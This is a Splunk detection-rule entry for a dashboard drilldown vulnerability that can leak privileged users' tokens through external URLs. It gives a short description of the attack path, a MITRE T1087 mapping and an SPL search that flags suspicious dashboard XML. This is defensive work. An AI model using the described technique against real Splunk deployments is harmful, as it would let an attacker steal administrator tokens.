Techniques
Sample rules
Splunk Account Discovery Drilldown Dashboard Disclosure
- source: splunk
- technicques:
- T1087
Description
Splunk drilldown vulnerability disclosure in Dashboard application that can potentially allow exposure of tokens from privilege users. An attacker can create dashboard and share it to privileged user (admin) and detokenize variables using external urls within dashboards drilldown function.
Detection logic
| rest splunk_server=local /servicesNS/-/-/data/ui/views
| search eai:data="*$env:*" eai:data="*url*" eai:data="*options*"
| rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML"
| fields Author Permissions App "Dashboard XML"
| `splunk_account_discovery_drilldown_dashboard_disclosure_filter`